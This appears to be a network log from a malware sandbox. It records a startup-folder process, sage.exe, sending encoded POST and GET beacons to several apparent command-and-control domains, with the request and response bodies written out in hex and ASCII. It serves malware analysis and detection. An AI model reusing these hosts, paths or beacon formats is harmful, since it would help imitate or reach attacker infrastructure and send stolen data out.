Nov 28, 2024 19:01:25.311614037 CET | 1.1.1.1 | 192.168.11.20 | 0x8347 | No error (0) | www.tyai36.top | tyai36.top | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 19:01:25.311614037 CET | 1.1.1.1 | 192.168.11.20 | 0x8347 | No error (0) | tyai36.top | | 38.47.207.120 | A (IP address) | IN (0x0001) | false
Nov 28, 2024 19:01:39.822860956 CET | 1.1.1.1 | 192.168.11.20 | 0x8ff5 | No error (0) | www.homebizsuccess.blog | homebizsuccess.blog | | CNAME (Canonical name) | IN (0x0001) | false
Nov 28, 2024 19:01:39.822860956 CET | 1.1.1.1 | 192.168.11.20 | 0x8ff5 | No error (0) | homebizsuccess.blog | | 192.185.16.209 | A (IP address) | IN (0x0001) | false
• www.1win-moldovia.fun
• www.akravchenko.dev
• www.hubeisuizhou.net
• www.bashei.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49715 | 172.67.149.53 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:56:49.036932945 CET | 399 | OUT | GET /rfr1/?YDrhw=DvQP9LC050182Z3&VX=F4hOgqu9W5FpVGQoAREgTite/5iXCZQ+jfwfTHlgxAY2vkqeiMz3vCoerVdgDkzWxU8N3qFnpYIa4u2RgKwz4Zn2GG0gDMAqCr9egx1VT+K5Ui7eAt5njHk= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.1win-moldovia.fun
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Nov 28, 2024 18:56:51.298477888 CET | 968 | IN | HTTP/1.1 523
Date: Thu, 28 Nov 2024 17:56:51 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 15
Connection: close
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kBH4hs7cb6Yx3zyLcYuW8nw8ouuiDwAU1qgf2FioVC01wXEz6%2Bd4%2BN9gu%2B8Hky451ayW067hYDpWGkx7FKsc4gSaBZAgiRn3ZtE3dTeu2UbcIsRmRZFvQp33niAaB77XgEDWF3vU0Hc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 8e9c3c9ef9c20ad3-LAS
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=156398&min_rtt=156398&rtt_var=78199&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
Data Ascii: error code: 523


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49716 | 217.70.184.50 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:07.324217081 CET | 657 | OUT | POST /l1qb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Origin: http://www.akravchenko.dev
Referer: http://www.akravchenko.dev/l1qb/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 69 6b 47 41 31 6a 4b 4c 4b 6f 73 5a 6d 47 6e 74 4e 4c 67 66 61 62 76 53 57 31 6e 4b 64 38 58 4d 61 63 74 2f 65 35 57 6a 43 5a 2b 47 6f 58 77 66 57 53 45 2f 45 70 53 7a 78 75 6f 36 5a 6a 65 69 79 35 59 47 59 56 42 77 50 36 77 73 43 4f 47 32 73 76 30 63 52 43 66 71 4c 52 65 79 74 69 71 37 6c 6c 50 78 4b 57 65 2b 35 36 4c 48 34 65 47 4a 2b 36 79 6b 37 52 67 4e 42 76 63 58 67 59 66 67 2f 4e 74 79 74 6d 37 4a 6c 65 43 6d 56 7a 6d 48 47 45 4d 33 75 44 47 62 37 73 65 57 69 32 72 6a 79 43 32 38 6f 2f 2f 49 39 31 42 67 46 2f 6f 35 38 51 63 2b 67 3d 3d
Data Ascii: VX=u8bQrE+on1LVrikGA1jKLKosZmGntNLgfabvSW1nKd8XMact/e5WjCZ+GoXwfWSE/EpSzxuo6Zjeiy5YGYVBwP6wsCOG2sv0cRCfqLReytiq7llPxKWe+56LH4eGJ+6yk7RgNBvcXgYfg/Ntytm7JleCmVzmHGEM3uDGb7seWi2rjyC28o//I91BgF/o58Qc+g==
Nov 28, 2024 18:57:07.627374887 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 28 Nov 2024 17:57:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49717 | 217.70.184.50 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:10.159029961 CET | 677 | OUT | POST /l1qb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Origin: http://www.akravchenko.dev
Referer: http://www.akravchenko.dev/l1qb/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 49 58 4d 37 41 74 2b 63 42 57 67 43 5a 2b 4f 49 58 78 41 6d 53 54 2f 45 31 67 7a 30 57 6f 36 5a 66 65 69 33 46 59 47 70 56 47 71 2f 36 79 6a 69 50 41 37 4d 76 30 63 52 43 66 71 4c 46 6b 79 73 4b 71 36 52 5a 50 77 70 4f 64 7a 5a 37 35 58 59 65 47 65 4f 36 4d 6b 37 51 46 4e 44 61 33 58 69 67 66 67 2b 39 74 6a 59 4b 34 41 6c 65 41 72 31 7a 31 4a 45 41 43 37 2b 72 35 54 62 6f 47 61 69 47 67 6d 6b 54 73 68 61 4c 62 4c 75 70 7a 6b 31 47 41 37 2b 52 48 6a 6c 66 6e 55 66 46 4e 4c 78 41 30 4a 48 6d 6d 6b 65 46 76 75 47 77 3d
Data Ascii: VX=u8bQrE+on1LVrHsGHWLKNqovWGGnmtLkfaXvSV53LvIXM7At+cBWgCZ+OIXxAmST/E1gz0Wo6Zfei3FYGpVGq/6yjiPA7Mv0cRCfqLFkysKq6RZPwpOdzZ75XYeGeO6Mk7QFNDa3Xigfg+9tjYK4AleAr1z1JEAC7+r5TboGaiGgmkTshaLbLupzk1GA7+RHjlfnUfFNLxA0JHmmkeFvuGw=
Nov 28, 2024 18:57:10.461786032 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 28 Nov 2024 17:57:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49718 | 217.70.184.50 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:13.002302885 CET | 2578 | OUT | POST /l1qb/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Origin: http://www.akravchenko.dev
Referer: http://www.akravchenko.dev/l1qb/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 7367
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Raw: 56 58 3d 75 38 62 51 72 45 2b 6f 6e 31 4c 56 72 48 73 47 48 57 4c 4b 4e 71 6f 76 57 47 47 6e 6d 74 4c 6b 66 61 58 76 53 56 35 33 4c 76 51 58 4c 4a 6b 74 2f 37 56 57 68 43 5a 2b 50 49 58 30 41 6d 53 53 2f 45 74 6b 7a 31 71 65 36 63 54 65 7a 68 78 59 41 62 39 47 2f 76 36 79 37 69 4f 48 32 73 76 39 63 52 79 54 71 4c 56 6b 79 73 4b 71 36 58 39 50 33 36 57 64 78 5a 36 4c 48 34 65 43 4a 2b 37 68 6b 34 67 2f 4e 44 66 4d 58 53 41 66 68 65 74 74 68 4b 53 34 50 6c 65 47 75 31 79 6f 4a 46 39 41 37 2b 6e 54 54 62 63 34 61 68 6d 67 71 56 36 56 6b 35 6e 2f 64 4f 31 4d 76 32 4f 4c 36 49 35 32 75 53 66 46 45 73 64 77 56 6c 41 78 50 6b 6d 74 6e 39 45 31 2f 54 54 70 41 4a 61 53 38 4e 37 6d 31 4e 34 6b 4e 6a 71 33 41 66 78 6a 48 35 6e 72 39 39 6c 53 75 30 64 4d 4c 61 54 78 4e 4a 46 36 4b 43 77 51 37 6b 49 31 6b 48 76 50 74 67 32 68 46 43 51 63 49 41 65 49 77 64 73 36 43 64 77 6f 55 6c 4b 31 38 6c 46 4a 59 66 31 35 77 46 4e 54 56 50 39 36 64 4c 51 62 76 37 55 51 5a 6e 2b 48 68 49 45 32 68 35 55 50 54 2f 63 69 50 71 73 [TRUNCATED]
                                                                                                                                              Data Ascii: VX=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 [TRUNCATED]
Nov 28, 2024 18:57:13.002372980 CET | 5248 | OUT | Data Ascii: MKROgzYzmRfLp6rSC6h7UvJtHnqwWICbAS7uN+N1LIz0kBCLQRGNM69QaFJYVrUVzr88D3q+KbrzZzssNLj0ZZQIUkpDNhStrK0Uq2OrFS9hF2R+ZFk5Vw0R+1PAYmMLcRePZ25sACdcKrHG22/6t2cfZGzVnYm+g8OYwrT0tS7KGAnBdVnm4B623RTL0v6911YpZB7aYHVDCf9sljVXrLEnXnIL5Bj48W7GtQ0ObY7XBqE7Ik6
Nov 28, 2024 18:57:13.332902908 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Thu, 28 Nov 2024 17:57:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49719 | 217.70.184.50 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:15.842971087 CET | 397 | OUT | GET /l1qb/?VX=j+zwo0WruX31giYaAXLqFZsOSDWIhP7jTa/dbVxGHcBqV/4l3NxJtgpmZpbROnG1sUhGxH62sOLj7xpOC5An+cKklQHM9vXGdSm+p7Uk9aee91hqvbKIz6k=&YDrhw=DvQP9LC050182Z3 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.akravchenko.dev
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Nov 28, 2024 18:57:16.147953987 CET | 1289 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 17:57:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Security-Policy: default-src 'self'; script-src 'nonce-018399ea1d4246858087221f0beb7bda';
Vary: Accept-Language
Data Ascii: 92e<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-018399ea1d4246858087221f0beb7bda';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>akravchenko.dev</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic
Nov 28, 2024 18:57:16.148065090 CET | 1289 | IN | Data Ascii: _2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=akravchenko.dev"><strong>View the WHOIS results of
Nov 28, 2024 18:57:16.148081064 CET | 67 | IN | Data Ascii: ko.dev'); }); });</script></main></div> </body></html>
Nov 28, 2024 18:57:16.148092985 CET | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49720 | 43.153.84.190 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:21.882464886 CET | 660 | OUT | POST /jywy/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hubeisuizhou.net
Origin: http://www.hubeisuizhou.net
Referer: http://www.hubeisuizhou.net/jywy/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Ascii: VX=TQq+VmIdEcefQBgqgqQMnzO026I33kTtWoIYVuf6tr/s2imbaZI3J+Yp9UWDEwNxUJUBuTRPffQ/BkoZ4E1J5gusfihi7JD72DUFewvC/H2H/cnMV53yqRswf5fKRWYGHbTywjBvn+dpgzW7vmJ+xG+UkmkDBTtkAZbPSlJG15VgMG60eg6Jqq+5RuR/+aM1aw==
Nov 28, 2024 18:57:22.056123018 CET | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 28 Nov 2024 17:57:21 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49721 | 43.153.84.190 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:24.592784882 CET | 680 | OUT | POST /jywy/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hubeisuizhou.net
Origin: http://www.hubeisuizhou.net
Referer: http://www.hubeisuizhou.net/jywy/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Ascii: VX=TQq+VmIdEcefBQQqjNkMhTO7oKI3sUTpWoEYVu3Qt5rs2A+bZco3O+Yp6kWMAwMcUJZyuStPffE/BgsZ43tOoguiSChk/JD72DUFew6X/HuH8s3MHY3x2Bs3PpfKVWYCHbTqwiMKn4Zpgym7u3J/7G+SgmlmBH0VOZTyVk1K0ptsAwruDSOtp5iLVeoX8YNuHxJVGjRzJEubergccZiza6E=
Nov 28, 2024 18:57:24.766431093 CET | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 28 Nov 2024 17:57:24 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49722 | 43.153.84.190 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:27.312975883 CET | 2578 | OUT | POST /jywy/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.hubeisuizhou.net
Origin: http://www.hubeisuizhou.net
Referer: http://www.hubeisuizhou.net/jywy/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 7367
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Nov 28, 2024 18:57:27.313054085 CET | 5251 | OUT | Data Ascii: RFCqMXqOd/JTCT+fCpNyeZqlec89C14W2SIvOGTJ3PXkqKBr02WNDw9GlUUN7ygrlSfKqLg6MRAWtyDSfxA6zJ66hFR14+jUD8JD6F+8DLSKsaX7jsJXmn+DrZ3WZZShtcN0Uo+z1D3jVIXHT/haYhiqsfABTcAZRiq8fPdcqkVokVPjTKWCsQ8NFZ7jjgmpGoPghtzGQULCpL8PYxvw8kbD4sVXpZXm8u/2nY3bUYK4y4O22qa
Nov 28, 2024 18:57:27.489638090 CET | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 28 Nov 2024 17:57:27 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.11.20 | 49723 | 43.153.84.190 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:30.023478985 CET | 398 | OUT | GET /jywy/?YDrhw=DvQP9LC050182Z3&VX=eSCeWRIoJNy1ChkNr9Mrph+bw9krj2HtA4M0Ycvj+4uTwHyRXe49PM8qrTbeBTFYTaFawzZELf0uMSg9ynQv9wCKXjtU0s3V3zZMSDWRvxGcx4r7U6700ik= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.hubeisuizhou.net
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
                                                                                                                                              Nov 28, 2024 18:57:30.196824074 CET289INHTTP/1.1 404 Not Found
                                                                                                                                              Server: nginx
                                                                                                                                              Date: Thu, 28 Nov 2024 17:57:30 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 146
                                                                                                                                              Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.11.20 | 49724 | 23.225.34.75 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:36.411322117 CET | 642 | OUT | POST /wh2p/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.bashei.top
Origin: http://www.bashei.top
Referer: http://www.bashei.top/wh2p/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Ascii: VX=w8bN3XVsOXgPp/VM080kTx7OSPKA0TPFIuL67BorN08jcBbzNFd8EdBbWqgluBOyMv1fCqP1tIVqxE7xkp5PTyUleKfFk/MPBsViotS7SgsF9q/I46+7pib0Ecx9NrT2Lv4/sz9szSxqYWXQB5g0whDRYUJyGh71fd5u35MlE7/d5fVFOn/L6zwELLyX22Ta2Q==
Nov 28, 2024 18:57:36.575314999 CET | 706 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 17:57:36 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49725 | 23.225.34.75 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:39.110080004 CET | 662 | OUT | POST /wh2p/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.bashei.top
Origin: http://www.bashei.top
Referer: http://www.bashei.top/wh2p/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 219
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Ascii: VX=w8bN3XVsOXgPocdM1fskUR7NcvKA9zPJIuH67A9uNiMjdjDzMHl8DdBbdKgkghOpMvJ9CoL1tIBqxBHxkY5QTiUnRqfL7PMPBsViotWBSg0F9ajI+Ya6qib7N8x9brT6Lv4Rsw5VzRJqYWnQCsczjBDTW0J8Vh6mXOVe/IU+IozX1pEfTVLv5gs2P7L/00SBrRvgDm/wa1YOOpJ6AjoXa5c=
Nov 28, 2024 18:57:39.273735046 CET | 706 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 28 Nov 2024 17:57:39 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Ascii: 1eaT=o0+ORVZ;r#H7"C,%?`#AC{wLrS/$18HHfK0&I9*mq}-=rHtxe|p35tk8V{VS45*M)^D d{N'WXj&7Dg`jP32)y@*mVY~\!%B{w^MEjA_A<rlqLDrT3:V)uwq{j(d$W;O(309Q4+kEf",4`JrfgrSTjgo?T~G\|W.8XtAFnx{wAn[ 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49726 | 23.225.34.75 | 80 | 4568 | C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe
Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 18:57:41.810581923 CET | 2578 | OUT | POST /wh2p/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.bashei.top
Origin: http://www.bashei.top
Referer: http://www.bashei.top/wh2p/
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 7367
Connection: close
User-Agent: Opera/9.80 (X11; Linux x86_64; U; fr) Presto/2.9 Version/11.50
Data Ascii: VX= [TRUNCATED]
Nov 28, 2024 18:57:41.810650110 CET | 5233 | OUT | Data Raw: 78 56 42 75 78 41 37 39 68 4a 6e 44 51 33 76 77 6c 33 68 37 47 45 6f 36 72 72 63 54 53 63 6e 46 79 58 39 32 35 4d 59 30 39 62 4d 65 32 2b 58 51 47 35 61 33 4c 51 58 66 33 79 51 62 76 35 34 7a 58 68 4a 42 46 57 30 6a 52 6f 31 49 54 41 37 6d 6c 49
